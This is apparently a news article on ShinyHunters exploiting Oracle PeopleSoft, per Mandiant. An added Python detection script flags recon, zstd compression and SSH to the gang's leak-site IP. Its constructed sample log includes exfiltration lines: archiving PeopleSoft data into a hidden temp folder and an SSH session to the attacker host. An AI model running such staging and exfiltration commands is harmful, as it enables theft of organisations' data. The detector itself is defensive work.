“While several organizations successfully blocked the activity or remediated the vulnerabilities, others experienced a compromise, resulting in stolen data being published to ShinyHunters DLS,” Mandiant said. (DLS is short for data leak site).
An analysis of a bash script left in the test environment shows that the attackers performed reconnaissance of the compromised organizations, including mapping PeopleSoft configurations, viewing the process scheduler, and inspecting WebLogic Server XML configurations. The stolen data was compressed with the zstd tool, and the threat actors then established an outbound SSH connection to 176.120.22.24, the IP address hosting the ShinyHunters DLS. The DLS claimed to hold 48 GB of data taken from a single victim.
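The sequence Mandiant describes (configuration reconnaissance, zstd compression, then an outbound SSH session to the DLS host) is a pattern a defender can hunt for in command-history or auditd-derived logs. The script below is an added example and is not code from Mandiant, Oracle, or the article; the only facts it takes from the report are the DLS IP address and the use of zstd. The usernames, file paths, timestamps and log lines are constructed for illustration, and the "PeopleSoft recon" keywords are an assumption about what configuration reads might look like, not indicators published by Mandiant.

```python
import re
from datetime import datetime, timedelta

# IP address the article names as hosting the ShinyHunters DLS.
DLS_IP = "176.120.22.24"

# Constructed sample feed: "<ISO timestamp> <user> <command>" per line.
# None of these lines are real log data.
SAMPLE_EVENTS = [
    "2025-12-01T02:11:03Z psadm cat /opt/psft/config/psconfig.sh",
    "2025-12-01T02:12:44Z psadm cat /opt/psft/webserv/peoplesoft/config/config.xml",
    "2025-12-01T02:14:10Z psadm tar cf - /opt/psft/data | zstd -T0 -o /tmp/.x/out.tar.zst",
    "2025-12-01T02:20:31Z psadm ssh -p 22 -i /tmp/.x/key user@176.120.22.24",
    "2025-12-01T03:05:00Z oracle sqlplus / as sysdba",
    "2025-12-01T09:00:00Z backup ssh admin@10.0.0.5 uptime",
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
SSH_RE = re.compile(r"\b(ssh|scp|sftp)\b")
# Assumed (hypothetical) markers of PeopleSoft/WebLogic configuration reads.
RECON_RE = re.compile(r"(psconfig|process[_ ]?scheduler|config\.xml)", re.I)


def parse_event(line):
    """Split one log line into (timestamp, user, command); None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["user"], m["cmd"]


def classify(cmd):
    """Tag a single command with the behaviours we care about."""
    tags = []
    if re.search(r"\bzstd\b", cmd):
        tags.append("zstd_compression")
    if SSH_RE.search(cmd) and DLS_IP in cmd:
        tags.append("ssh_to_dls")
    if RECON_RE.search(cmd):
        tags.append("peoplesoft_recon")
    return tags


def detect(lines, window=timedelta(minutes=30)):
    """Return (severity, user, reason, command) alerts for the feed.

    A bare SSH connection to the DLS host is 'high'; one that follows a zstd
    invocation by the same user within `window` is 'critical', because that
    ordering matches the staging-then-exfiltration sequence in the report.
    """
    alerts = []
    last_zstd = {}  # user -> timestamp of that user's most recent zstd command
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        ts, user, cmd = ev
        tags = classify(cmd)
        if "peoplesoft_recon" in tags:
            alerts.append(("low", user, "PeopleSoft/WebLogic config read", cmd))
        if "zstd_compression" in tags:
            last_zstd[user] = ts
            alerts.append(("medium", user, "zstd archive created", cmd))
        if "ssh_to_dls" in tags:
            severity = "high"
            reason = f"outbound SSH to DLS host {DLS_IP}"
            if user in last_zstd and ts - last_zstd[user] <= window:
                severity = "critical"
                reason += " shortly after zstd compression (likely exfiltration)"
            alerts.append((severity, user, reason, cmd))
    return alerts


if __name__ == "__main__":
    for severity, user, reason, cmd in detect(SAMPLE_EVENTS):
        print(f"[{severity:8}] {user}: {reason} :: {cmd}")
```

The ordering check is what makes the rule useful: an SSH session to a single IP is easy to block once the indicator is known, but pairing it with a preceding local compression step by the same account surfaces the same behaviour if the attacker moves to a different drop host.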
A partially redacted section of the ShinyHunters DLS.
Credit: Mandiant
ShinyHunters has been active since at least 2019. Over the past few years, it has executed dozens of attacks against some of the largest companies in the world, affecting millions of people. A small sample of victims includes Ticketmaster (via the breach of Snowflake, which hosted its data), Spain’s largest bank, Santander, and Salesforce (and, through it, Google and, reportedly, many other companies). ShinyHunters uses several techniques to gain initial access, including exploiting cloud misconfigurations and software vulnerabilities, OAuth token theft, supply chain attacks, voice phishing, and other forms of social engineering.
Mandiant and Rapid7 are providing detailed indicators of compromise. They are also advising PeopleSoft customers on steps they should take immediately. Given ShinyHunters’ success rate, all PeopleSoft users would do well to heed that advice.